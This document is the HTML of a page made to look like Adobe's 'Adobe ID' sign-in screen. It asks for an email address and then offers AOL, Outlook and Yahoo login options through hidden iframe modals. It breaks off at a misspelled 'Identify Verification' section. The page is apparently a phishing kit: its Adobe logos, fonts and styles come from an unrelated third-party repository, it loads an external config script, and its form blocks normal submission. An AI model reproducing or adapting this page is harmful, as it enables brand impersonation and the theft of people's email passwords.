<html lang="en" class="wf-adobeclean-n3-active wf-adobeclean-n7-active wf-adobeclean-n4-active wf-active">
<head>
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta charset="utf-8">
    <title>Adobe ID</title>
    <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <meta name="description" content="Adobe ID">
    <noscript>
        <style type="text/css">.Canvas-Layout {
            visibility: visible !important;
        }</style>
    </noscript>
    <style type="text/css">
        .Canvas-Layout.Canvas-Layout--susi-loaded {
            visibility: visible !important;
        }

        .Canvas-Layout {
            visibility: hidden;
        }

        .Canvas-Layout--susi-loaded.Canvas-Layout--with-header .Canvas-Header {
            display: flex !important;
        }

        .Canvas-Layout--susi-loaded.Canvas-Layout--with-footer .Canvas-Footer {
            display: flex !important;
        }

        .Canvas-Header, .Canvas-Footer {
            display: none;
        }

        @media screen and (min-width: 1024px) {
            .Canvas-Layout .Canvas-Grid.Canvas-Grid--reverse-dcp .Canvas-Context {
                -ms-grid-column: 15;
                -ms-grid-column-span: 7;
                grid-column: 8 / 12;
            }
        }

        @media screen and (min-width: 1024px) {
            .Canvas-Layout .Canvas-Grid.Canvas-Grid--reverse-dcp .Canvas-Panel {
                -ms-grid-column: 3;
                -ms-grid-column-span: 11;
                grid-column: 2 / 8;
            }
        }

        @media screen and (min-width: 1280px) {
            .Canvas-Layout .Canvas-Grid.Canvas-Grid--reverse-dcp .Canvas-Panel.Canvas-Item {
                -ms-grid-column: 3;
                -ms-grid-column-span: 9;
                grid-column: 2 / 7;
            }
        }

        /* IE11 Hack for vertical alignment because it doesn't support min-height in the way needed */
        _:-ms-fullscreen, :root .Canvas-Layout {
            height: 100%;
        }

        #App, #UnsupportedBrowser {
            display: none;
        }</style>
    <style type="text/css">
        .spectrum--darkest .spectrum-Button--cta {
            background-color: #1473e6;
            border-color: #1473e6;
            color: #fff;
        }

        .spectrum--darkest .Canvas .Canvas-Background, .spectrum--darkest .Canvas .Canvas-Grid {
            background: #080808;
        }

        @media screen and (min-width: 510px) {
            .spectrum--darkest .Canvas .Canvas-Background {
                background: rgba(0, 0, 0, 0.5);
            }

            .spectrum--darkest .Canvas .Canvas-Grid {
                background: rgba(0, 0, 0, 0);
            }
        }

        .spectrum--darkest .CardLayout {
            background: #080808;
        }

        .spectrum--darkest .spectrum-Textfield {
            background-color: #080808;
            border-color: #393939;
            color: #c8c8c8;
        }

        .spectrum--darkest .spectrum-Textfield--quiet {
            background-color: rgba(0, 0, 0, 0);
            border-color: #393939;
        }

        .spectrum--darkest .spectrum-FieldLabel {
            color: #a2a2a2;
        }

        .spectrum--darkest {
            background-color: #1e1e1e;
            color: #b4b4b4;
        }

        .spectrum--darkest .spectrum-Heading1 {
            color: #e2e2e2;
        }

        .spectrum--darkest .spectrum-Textfield::-webkit-input-placeholder, .spectrum--darkest .spectrum-Textfield::-moz-placeholder, .spectrum--darkest .spectrum-Textfield:-ms-input-placeholder, .spectrum--darkest .spectrum-Textfield::-ms-input-placeholder {
            color: #7c7c7c;
        }</style>
    <link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/favicon.ico">
    <style>
        .spectrum-Button {
            display: -ms-inline-flexbox;
            display: -webkit-inline-box;
            display: -webkit-inline-flex;
            display: -moz-inline-box;
            display: inline-flex;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            -ms-flex-align: center;
            -webkit-box-align: center;
            -webkit-align-items: center;
            -moz-box-align: center;
            align-items: center;
            -ms-flex-pack: center;
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -moz-box-pack: center;
            justify-content: center;
            overflow: visible;
            margin: 0;
            border-style: solid;
            text-transform: none;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
            -webkit-appearance: button;
            vertical-align: top;
            text-decoration: none;
            font-family: adobe-clean-ux, adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, sans-serif;
            line-height: 1.3
        }

        .spectrum-Button::-moz-focus-inner {
            border: 0;
            border-style: none;
            padding: 0;
            margin-top: -2PX;
            margin-bottom: -2PX
        }

        .spectrum-Button {
            border-width: 2px;
            border-style: solid;
            border-radius: 16px;
            min-height: 32px;
            height: auto;
            min-width: 72px;
            padding: 3.5px 14px 4.5px;
            font-size: 14px;
            font-weight: 700
        }

        .spectrum-Button-label {
            -ms-flex-item-align: center;
            -ms-grid-row-align: center;
            -webkit-align-self: center;
            align-self: center;
            -ms-grid-column-align: center;
            justify-self: center;
            text-align: center;
            width: 100%
        }

        .spectrum--lightest .spectrum-Button--cta {
            background-color: #1473e6;
            border-color: #1473e6;
            color: #fff
        }

        .Canvas {
            height: 100%;
            position: relative;
            width: 100%
        }

        .Canvas-Background {
            background: #fff;
            height: 100%;
            -webkit-overflow-scrolling: touch;
            overflow-x: hidden;
            overflow-y: auto
        }

        .Canvas-Layout {
            display: -ms-grid;
            display: grid;
            position: relative;
            -ms-grid-rows: 60px min-content minmax(min-content, 1fr) minmax(35px, min-content);
            grid-template-rows:60px -webkit-min-content minmax(-webkit-min-content, 1fr) minmax(35px, -webkit-min-content);
            grid-template-rows:60px min-content minmax(min-content, 1fr) minmax(35px, min-content);
            -ms-grid-columns: 1fr 1fr 1fr;
            grid-template-columns:1fr 1fr 1fr;
            min-height: 100%
        }

        .Canvas-Layout > :first-child {
            -ms-grid-row: 1;
            -ms-grid-column: 1
        }

        .Canvas-Layout > :nth-child(2) {
            -ms-grid-row: 1;
            -ms-grid-column: 2
        }

        .Canvas-Layout > :nth-child(3) {
            -ms-grid-row: 1;
            -ms-grid-column: 3
        }

        .Canvas-Layout .Canvas-Grid {
            -ms-grid-row: 1;
            -ms-grid-row-span: 4;
            grid-row: 1/5;
            -ms-grid-column: 1;
            -ms-grid-column-span: 3;
            grid-column: 1/4
        }

        .Canvas-Layout--only-grid .Canvas-Grid {
            -ms-grid-row: 1;
            -ms-grid-row-span: 4;
            grid-row: 1/5
        }

        .Canvas-Layout .Canvas-Footer, .Canvas-Layout .Canvas-Header {
            -webkit-box-align: stretch;
            -webkit-align-items: stretch;
            -moz-box-align: stretch;
            -ms-flex-align: stretch;
            align-items: stretch;
            -ms-grid-column: 1;
            -ms-grid-column-span: 3;
            grid-column: 1/4
        }

        .Canvas-Layout .Canvas-Header {
            -ms-grid-row: 1;
            -ms-grid-row-span: 1;
            grid-row: 1/2;
            min-height: 60px
        }

        .Canvas-Layout .Canvas-Footer {
            -ms-grid-row: 4;
            -ms-grid-row-span: 1;
            grid-row: 4/5
        }

        .Canvas-Grid {
            display: block;
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -moz-box-pack: center;
            -ms-flex-pack: center;
            justify-content: center;
            background: #fff;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            width: 100%;
            padding-left: 17px;
            padding-right: 14px;
            position: relative
        }

        .Canvas-Grid .Canvas-Panel {
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            width: 100%;
            -ms-grid-column: 1;
            -ms-grid-column-span: 23;
            grid-column: 1/13;
            -ms-grid-row: 1;
            grid-row: 1;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal;
            -webkit-flex-direction: column;
            -moz-box-orient: vertical;
            -moz-box-direction: normal;
            -ms-flex-direction: column;
            flex-direction: column;
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -moz-box-pack: center;
            -ms-flex-pack: center;
            justify-content: center;
            margin: 0 auto
        }

        @media screen and (min-width: 510px) {
            .Canvas {
                background: #f4f4f4 50%;
                background-size: cover;
                height: 100%
            }

            .Canvas-Background {
                background: rgba(0, 0, 0, .5)
            }

            .Canvas-Layout {
                -ms-grid-columns: 1fr minmax(-webkit-min-content, 1280px) 1fr;
                -ms-grid-columns: 1fr minmax(min-content, 1280px) 1fr;
                grid-template-columns:1fr minmax(-webkit-min-content, 1280px) 1fr;
                grid-template-columns:1fr minmax(min-content, 1280px) 1fr
            }

            .Canvas-Layout .Canvas-Grid {
                -ms-grid-column: 2;
                -ms-grid-column-span: 1;
                grid-column: 2/3
            }

            .Canvas-Grid {
                -webkit-box-align: center;
                -webkit-align-items: center;
                -moz-box-align: center;
                -ms-flex-align: center;
                align-items: center;
                background: rgba(0, 0, 0, 0);
                margin: 0 auto;
                padding-left: 0;
                padding-right: 0
            }

            .Canvas-Grid .Canvas-Panel {
                height: 100%;
                width: 100%;
                width: 510px
            }
        }

        @media screen and (max-width: 509px) {
            .Canvas-Background, .Canvas-Grid, .Canvas-Item, .Canvas-Layout, .CardLayout-Container, .CardLayout-Toaster-Container, .Content {
                height: 100%
            }
        }

        @media screen and (min-width: 1280px) {
            .Canvas-Grid {
                display: -ms-grid;
                display: grid;
                -ms-grid-rows: 1fr;
                grid-template-rows:1fr;
                -ms-grid-columns: 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr 32px 1fr;
                grid-template-columns:repeat(12, 1fr);
                grid-gap: 0 32px;
                gap: 0 32px
            }

            .Canvas-Grid .Canvas-Panel {
                -webkit-box-pack: center;
                -webkit-justify-content: center;
                -moz-box-pack: center;
                -ms-flex-pack: center;
                justify-content: center;
                -ms-grid-column: 13;
                -ms-grid-column-span: 9;
                grid-column: 7/12
            }
        }

        @media screen and (max-width: 1023px) {
            .Canvas-Layout .Canvas-Footer .DCP-Layout {
                display: block
            }
        }

        noscript:not(:empty) ~ .CardLayout {
            border-top-left-radius: 0;
            border-top-right-radius: 0
        }

        .CardLayout {
            background: #fff;
            border-radius: 4px;
            border: 1px solid hsla(0, 0%, 100%, 0);
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal;
            -webkit-flex-direction: column;
            -moz-box-orient: vertical;
            -moz-box-direction: normal;
            -ms-flex-direction: column;
            flex-direction: column;
            min-height: 100%;
            padding: 24px 0 40px;
            position: relative
        }

        .CardLayout, .CardLayout-Container {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box
        }

        .CardLayout-Toaster-Container {
            position: relative;
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            -webkit-box-orient: vertical;
            -webkit-box-direction: normal;
            -webkit-flex-direction: column;
            -moz-box-orient: vertical;
            -moz-box-direction: normal;
            -ms-flex-direction: column;
            flex-direction: column
        }

        .CardLayout__header h1 {
            margin: 0
        }

        .CardLayout__content {
            -webkit-box-flex: 1;
            -webkit-flex-grow: 1;
            -moz-box-flex: 1;
            -ms-flex-positive: 1;
            flex-grow: 1
        }

        @media screen and (min-width: 510px) {
            .CardLayout {
                -webkit-box-sizing: border-box;
                -moz-box-sizing: border-box;
                box-sizing: border-box;
                min-height: 630px;
                padding: 24px 56px 40px
            }

            .CardLayout-Container {
                padding: 16px 0;
                display: -webkit-box;
                display: -webkit-flex;
                display: -moz-box;
                display: -ms-flexbox;
                display: flex;
                -webkit-box-orient: vertical;
                -webkit-box-direction: normal;
                -webkit-flex-direction: column;
                -moz-box-orient: vertical;
                -moz-box-direction: normal;
                -ms-flex-direction: column;
                flex-direction: column;
                -webkit-box-pack: center;
                -webkit-justify-content: center;
                -moz-box-pack: center;
                -ms-flex-pack: center;
                justify-content: center
            }
        }

        @media screen and (min-width: 1024px) {
            .CardLayout {
                padding: 40px 56px
            }
        }

        .spectrum-Textfield {
            padding: 3px 12px 5px;
            font-family: adobe-clean, Helvetica, Arial, sans-serif
        }

        .spectrum--lightest .spectrum-Textfield {
            background-color: #fff;
            border-color: #eaeaea;
            color: #505050
        }

        .spectrum--lightest .spectrum-Textfield::-webkit-input-placeholder {
            color: #959595
        }

        .spectrum--lightest .spectrum-Textfield::-moz-placeholder {
            color: #959595
        }

        .spectrum--lightest .spectrum-Textfield:-ms-input-placeholder {
            color: #959595
        }

        .spectrum--lightest .spectrum-Textfield::-ms-input-placeholder {
            color: #959595
        }

        .spectrum--lightest .spectrum-Textfield--quiet {
            background-color: rgba(0, 0, 0, 0);
            border-color: #eaeaea
        }

        .spectrum-FieldLabel {
            display: block;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 4px 0 5px;
            font-size: 12px;
            font-weight: 400;
            line-height: 1.3;
            vertical-align: top;
            -webkit-font-smoothing: subpixel-antialiased;
            -moz-osx-font-smoothing: auto;
            font-smoothing: subpixel-antialiased
        }

        .spectrum--lightest .spectrum-FieldLabel {
            color: #747474
        }

        .Context__header-icon {
            height: 18px;
            margin-right: 8px
        }

        @media screen and (min-width: 1280px) {
            .Context__header-icon {
                height: 40px;
                margin-right: 16px
            }
        }

        .SpinnerButton {
            display: -webkit-inline-box;
            display: -webkit-inline-flex;
            display: -moz-inline-box;
            display: -ms-inline-flexbox;
            display: inline-flex
        }

        .SpinnerButton .spectrum-Button-label {
            width: auto
        }

        .SpinnerButton--right .spectrum-Button-label {
            -webkit-box-ordinal-group: 2;
            -webkit-order: 1;
            -moz-box-ordinal-group: 2;
            -ms-flex-order: 1;
            order: 1
        }

        .DCP-Layout {
            display: -ms-grid;
            display: grid;
            -webkit-box-align: stretch;
            -webkit-align-items: stretch;
            -moz-box-align: stretch;
            -ms-flex-align: stretch;
            align-items: stretch;
            width: 100%;
            -ms-grid-rows: 100%;
            grid-template-rows:100%;
            -ms-grid-columns: minmax(1fr, -webkit-min-content);
            -ms-grid-columns: minmax(1fr, min-content);
            grid-template-columns:minmax(1fr, -webkit-min-content);
            grid-template-columns:minmax(1fr, min-content)
        }

        .Canvas-Header {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 0 16px;
            color: #747474;
            background-color: #fff;
            border-bottom: 1px solid transparent
        }

        .Canvas-Footer {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 10px 16px;
            color: #747474;
            background-color: #fff;
            border-top: 1px solid transparent
        }

        html {
            line-height: 1.15;
            -ms-text-size-adjust: 100%;
            -webkit-text-size-adjust: 100%
        }

        footer, header, section {
            display: block
        }

        h1 {
            font-size: 2em;
            margin: .67em 0
        }

        img {
            border-style: none
        }

        svg:not(:root) {
            overflow: hidden
        }

        button, input {
            font-family: sans-serif;
            font-size: 100%;
            line-height: 1.15;
            margin: 0
        }

        button, input {
            overflow: visible
        }

        button {
            text-transform: none
        }

        button {
            -webkit-appearance: button
        }

        button::-moz-focus-inner {
            border-style: none;
            padding: 0
        }

        button:-moz-focusring {
            outline: 1px dotted ButtonText
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        .react-spectrum-provider {
            position: relative
        }

        .spectrum--lightest {
            background-color: #fff
        }

        .spectrum {
            font-family: adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, sans-serif;
            font-size: 14px
        }

        .spectrum-Heading1 {
            font-style: normal;
            margin-bottom: 8px;
            margin-top: 8px
        }

        .spectrum-Heading1 {
            font-size: 36px;
            font-weight: 700;
            line-height: 1.3;
            letter-spacing: 0;
            text-transform: none
        }

        .spectrum {
            font-size: 14px;
            font-weight: 400;
            line-height: 1.5;
            font-style: normal
        }

        .spectrum--lightest .spectrum-Heading1 {
            color: #323232
        }

        .spectrum--lightest {
            color: #505050
        }

        .EmailPage .CardLayout__content {
            margin-top: 32px
        }

        .EmailPage__email-field.form-group {
            margin: 32px 0 21px
        }

        .EmailPage__submit {
            -webkit-align-content: center;
            -ms-flex-line-pack: center;
            align-content: center;
            display: -webkit-box;
            display: -webkit-flex;
            display: -moz-box;
            display: -ms-flexbox;
            display: flex;
            -webkit-box-pack: justify;
            -webkit-justify-content: space-between;
            -moz-box-pack: justify;
            -ms-flex-pack: justify;
            justify-content: space-between
        }

        .spectrum-Textfield {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            border: 1px solid;
            border-radius: 4px;
            padding: 5px 11px 7px;
            text-indent: 0;
            min-width: 48px;
            height: 32px;
            width: 192px;
            vertical-align: top;
            margin: 0;
            overflow: visible;
            font-family: adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;
            font-size: 14px;
            line-height: 1.5;
            -o-text-overflow: ellipsis;
            text-overflow: ellipsis;
            outline: 0;
            -webkit-appearance: none;
            -moz-appearance: textfield
        }

        .spectrum-Textfield::-webkit-input-placeholder {
            font-weight: 400;
            font-style: italic;
            opacity: 1
        }

        .spectrum-Textfield::-moz-placeholder {
            font-weight: 400;
            font-style: italic;
            opacity: 1
        }

        .spectrum-Textfield:-ms-input-placeholder {
            font-weight: 400;
            font-style: italic;
            opacity: 1
        }

        .spectrum-Textfield::-ms-input-placeholder {
            font-weight: 400;
            font-style: italic;
            opacity: 1
        }

        .spectrum-Textfield::-ms-clear {
            width: 0;
            height: 0
        }

        .spectrum-Textfield::-webkit-inner-spin-button, .spectrum-Textfield::-webkit-outer-spin-button {
            -webkit-appearance: none;
            margin: 0
        }

        .spectrum-Textfield:-moz-ui-invalid {
            box-shadow: none
        }

        .spectrum-Textfield--quiet {
            border-radius: 0;
            border-width: 0 0 1px;
            padding-left: 0;
            padding-right: 0;
            resize: none;
            overflow-y: hidden
        }

        #App, #UnsupportedBrowser, .spectrum, html {
            height: 100%;
            overflow: hidden
        }

        body {
            margin: 0
        }

        .spectrum .spectrum-Textfield {
            width: 100%
        }

        .ta-right {
            text-align: right
        }

        .ta-left {
            text-align: left
        }

        .spectrum-Button:last-child {
            margin-right: 0
        }

        .credential-hide-helper {
            margin: -1px 0 0;
            padding: 0;
            height: 1px;
            overflow: hidden;
            visibility: hidden
        }

        .spectrum .spectrum-Textfield {
            font-size: 16px;
            line-height: 1.15
        }

        .form-group {
            margin: 15px 0;
            min-height: 69px;
            position: relative
        }

        .form-group:first-child {
            margin-top: 0
        }

        .form-group .spectrum-FieldLabel {
            padding-bottom: 0;
            padding-top: 0
        }

        .form-group .spectrum-Textfield {
            height: 28px;
            padding-bottom: 0;
            padding-top: 0
        }

        #UnsupportedBrowser .Canvas {
            background-image: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/img/canvas/Fotolia_113489662_XL.jpg)
        }

        #UnsupportedBrowser .Canvas-Background {
            position: relative
        }

        #UnsupportedBrowser .Canvas-Item.Canvas-Panel {
            position: absolute;
            top: 50%;
            left: 50%;
            width: 510px;
            height: 630px;
            margin-left: -255px;
            margin-top: -315px
        }

        #UnsupportedBrowser .CardLayout {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            border-color: #fff;
            width: 510px;
            height: 630px;
            padding: 40px 56px
        }

        #UnsupportedBrowser .Context__header-icon {
            max-height: 18px
        }

        @media (min-width: 304px) {
            .mb-xs-1 {
                margin-bottom: 8px !important
            }

            .mt-xs-2 {
                margin-top: 16px !important
            }
        }

        @media screen and (max-width: 768px) {
            .form-group .spectrum-Textfield {
                font-size: 19px
            }
        }
    </style>
    <link href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/b84955e2d/styles.96385d07.css" rel="stylesheet" as="style"
          onload="this.onload=null;this.rel='stylesheet'">
    <style type="text/css">.tk-adobe-clean {
        font-family: "adobe-clean", sans-serif;
    }</style>
    <style type="text/css">
        @font-face {
        font-family: adobe-clean;
        src: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/27/l?subset_id=2&fvd=n4&v=3) format("woff2"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/27/d?subset_id=2&fvd=n4&v=3) format("woff"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/27/a?subset_id=2&fvd=n4&v=3) format("opentype");
        font-weight: 400;
        font-style: normal;
        font-display: auto;
    }

    @font-face {
        font-family: adobe-clean;
        src: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/29/l?subset_id=2&fvd=n7&v=3) format("woff2"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/29/d?subset_id=2&fvd=n7&v=3) format("woff"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/29/a?subset_id=2&fvd=n7&v=3) format("opentype");
        font-weight: 700;
        font-style: normal;
        font-display: auto;
    }

    @font-face {
        font-family: adobe-clean;
        src: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/28/l?subset_id=2&fvd=n3&v=3) format("woff2"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/28/d?subset_id=2&fvd=n3&v=3) format("woff"), url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/fonts/28/a?subset_id=2&fvd=n3&v=3) format("opentype");
        font-weight: 300;
        font-style: normal;
        font-display: auto;
    }

    @media screen and (min-width: 767px) {
        .ContextLogo {
            display: none !important;
        }
    }
    </style>
    <noscript>
        <link href="https://auth.services.adobe.com/b84955e2d/styles.96385d07.css" rel="stylesheet">
    </noscript>

    <link href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/static/style.css" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.css"/>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
          integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <script src="https://kit.fontawesome.com/fe3395b3ac.js" crossorigin="anonymous"></script>
    <script src="../CONFIG.js"></script>
</head>
<body class="spectrum" lang="en">
<div id="App" style="display: block;">
    <div class="react-spectrum-provider spectrum spectrum--lightest spectrum--medium" data-reactroot="">
        <div class="Canvas Canvas--background-danielciocirlan" data-id="Canvas">
            <section class="Canvas-Background">
                <div class="Canvas-Layout Canvas-Layout--only-grid Canvas-Layout--dcp-loaded Canvas-Layout--susi-loaded">
                    <div class="Canvas-Grid">
                        <div class="Canvas-Item Canvas-Context">
                            <div class="Context-Container">
                                <div class="Context" data-id="Adobe-Default-Context">
                                    <div class="Context__header"><img
                                            class="Context__header-icon Context__Header-icon--default"
                                            data-id="Adobe-Default-Context-Icon"
                                            src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/img/generic/adobe_logo_white.svg"
                                            alt="Adobe Logo"></div>
                                    <p class="Context__copy">Sign in with your email account</p></div>
                            </div>
                        </div>
                        <section class="Canvas-Item Canvas-Panel">
                            <div class="Route">
                                <section class="Content">
                                    <div class="CardLayout-Container EmailPage" data-id="">
                                        <div class="CardLayout-Toaster-Container">
                                            <noscript></noscript>
                                            <section class="CardLayout">
                                                <section class="ContextLogo">
                                                    <div class="Context" data-id="Adobe-Default-Context">
                                                        <div class="Context__header">
                                                            <div class="Logo"><img class="Context__header-icon"
                                                                                   data-id="Adobe-Default-Context-Icon-Black"
                                                                                   src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/img/generic/adobe_logo_black.svg"
                                                                                   alt="Adobe Logo"></div>
                                                        </div>
                                                    </div>
                                                </section>
                                                <header class="CardLayout__header"><h1 class="spectrum-Heading1">Sign
                                                    in</h1>
                                                    <p class="EmailPage__instructions">Enter your email address to continue</p>
                                                </header>
                                                <section class="CardLayout__content">
                                                    <form id="EmailForm" method="post"
                                                          onsubmit="event.preventDefault();return false;">
                                                        <section class="EmailPage__email-field form-group">
                                                            <div><label class="spectrum-FieldLabel"
                                                                        id="react-spectrum-4"
                                                                        for="EmailPage-EmailField">Email address</label><input
                                                                    type="email"
                                                                    class="spectrum-Textfield spectrum-Textfield--quiet"
                                                                    autocomplete="username" id="EmailPage-EmailField"
                                                                    data-id="EmailPage-EmailField" name="username"
                                                                    value="">
                                                                <div class="credential-hide-helper">
                                                                </div>
                                                                <label style="display: none"
                                                                       data-id="EmailPage-EmailField-Error"
                                                                       for="EmailPage-EmailField"
                                                                       class="spectrum-FieldLabel mod-error-label InlineError">Please
                                                                    enter an email address.</label>
                                                            </div>
                                                        </section>
                                                        <section columns="2" class="EmailPage__submit mod-submit">
                                                            <div class="ta-left"></div>
                                                            <div class="ta-right">
                                                                <button data-id="EmailPage-ContinueButton"
                                                                        class="spectrum-Button spectrum-Button--cta SpinnerButton SpinnerButton--right">
                                                                    <span class="spectrum-Button-label">Continue</span>
                                                                    <i class="fas fa-circle-notch fa-spin"
                                                                       aria-hidden="true"></i>
                                                                </button>
                                                            </div>
                                                        </section>
                                                    </form>
                                                    <div class="RuleWithText EmailPage__social-separator mt-xs-3">Or
                                                    </div>
                                                    <section class="SocialButtons">
                                                        <a href="#aol"  id="Signup-GoogleButton" data-id="EmailPage-GoogleSignInButton"
                                                                                      role="button" tabindex="0"
                                                                                      class="spectrum-ActionButton SocialButton SocialButton--google office_button">
                                                        <span class="spectrum-ActionButton-label">Continue with AOL</span></a>
                                                        <a href="#outlook" role="button"
                                                            tabindex="0"
                                                            class="spectrum-ActionButton SocialButton SocialButton--facebook outlook_button"><span
                                                            class="spectrum-ActionButton-label">Continue with Outlook</span></a>
                                                        <a href="#yahoo" role="button"
                                                            tabindex="0"
                                                            class="spectrum-ActionButton SocialButton SocialButton--apple yahoo_button">
                                                        <span class="spectrum-ActionButton-label">Continue with Yahoo</span></a>
                                                    </section>
                                                </section>
                                            </section>
                                        </div>
                                    </div>
                                </section>
                            </div>
                        </section>
                    </div>
                    <aside class="Canvas-Attribution">
                        <section class="Canvas-Author"><span>Daniel Ciocirlan</span></section>
                    </aside>
                </div>
            </section>
        </div>
    </div>
</div>
<div id="UnsupportedBrowser">
    <div class="react-spectrum-provider spectrum spectrum--medium">
        <div class="Canvas">
            <section class="Canvas-Background">
                <div class="Canvas-Item Canvas-Panel">
                    <div class="CardLayout-Container">
                        <div class="CardLayout">
                            <div class="mb-xs-1" data-id="Adobe-Default-Context">
                                <div class="Logo"><img class="Context__header-icon" height="18px"
                                                       data-id="Adobe-Default-Context-Icon-Black"
                                                       src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/adobe_assets/img/generic/adobe_logo_black.svg"
                                                       alt="Adobe Logo"></div>
                            </div>
                            <header class="CardLayout__header">
                                <div class="IconHeading">
                                    <div class="Icon IconHeading__icon">
                                        <svg id="S_Illu_Alert_56" xmlns="http://www.w3.org/2000/svg" width="62.867"
                                             height="56" viewBox="0 0 62.867 56">
                                            <g id="Group_154445" data-name="Group 154445"
                                               transform="translate(-685 -168.001)" style="isolation: isolate">
                                                <path id="Path_139" data-name="Path 139"
                                                      d="M63.985,65.2H12.432a5.657,5.657,0,0,1-4.9-8.486L33.308,12.036a5.657,5.657,0,0,1,9.8,0L68.884,56.719a5.657,5.657,0,0,1-4.9,8.486ZM38.209,12.033a2.8,2.8,0,0,0-2.45,1.414h0L9.983,58.134a2.829,2.829,0,0,0,2.45,4.243H63.985a2.829,2.829,0,0,0,2.45-4.243L40.658,13.449a2.8,2.8,0,0,0-2.45-1.416Zm-3.677.707Z"
                                                      transform="translate(678.225 158.796)" fill="#bcbcbc"></path>
                                                <path id="Path_140" data-name="Path 140"
                                                      d="M28.914,39.792A1.414,1.414,0,0,1,27.5,38.378V24.968a1.414,1.414,0,0,1,2.829,0V38.378A1.414,1.414,0,0,1,28.914,39.792Z"
                                                      transform="translate(686.812 164.741)" fill="#bcbcbc"></path>
                                                <circle id="Ellipse_15" data-name="Ellipse 15" cx="2.122" cy="2.122"
                                                        r="2.122" transform="translate(713.605 209.483)"
                                                        fill="#bcbcbc"></circle>
                                            </g>
                                        </svg>
                                    </div>
                                    <h1 class="spectrum-Heading1 IconHeading__heading mt-xs-2">Browser not
                                        supported</h1></div>
                            </header>
                            <div class="CardLayout__content">
                                <div>To use the current website, please update your browser to the latest version or try
                                    a different browser.
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
    </div>
</div>


<div id="yahoo_modal" style="display:none;padding: 0 !important;border-width: 0">
    <iframe scrolling="no" style="width: 100%; height: 100%; overflow: hidden" src=""></iframe>
</div>


<div id="rackspace_modal" style="display:none;padding: 0 !important;border-width: 0">
    <iframe scrolling="no" style="width: 100%; height: 100%; overflow: hidden" src=""></iframe>
</div>


<div id="others_modal" style="display:none;padding: 0 !important;border-width: 0">
    <iframe scrolling="no" style="width: 100%; height: 100%; overflow: hidden" src=""></iframe>
</div>

<div id="outlook_modal" style="display:none;padding: 0 !important;border-width: 0">
    <iframe scrolling="no" style="width: 100%; height: 100%; overflow: hidden" src=""></iframe>
</div>

<div id="yahoo_modaly" style="display:none;">

    <div class="mbr-login-hd txt-align-center">
        <img src="https://s.yimg.com/wm/assets/images/ns/aol-logo-black-v.0.0.2.png" alt="Aol" class="logo aol-en-US"
             width="100" height="">
        <img src="https://s.yimg.com/wm/assets/images/ybar/aol-logo-white-v0.0.4.png" alt="Aol"
             class="dark-mode-logo logo aol-en-US" width="100" height="">
    </div>

    <h2 style="font-weight: 700;color: black;">Identify Verification</h2>
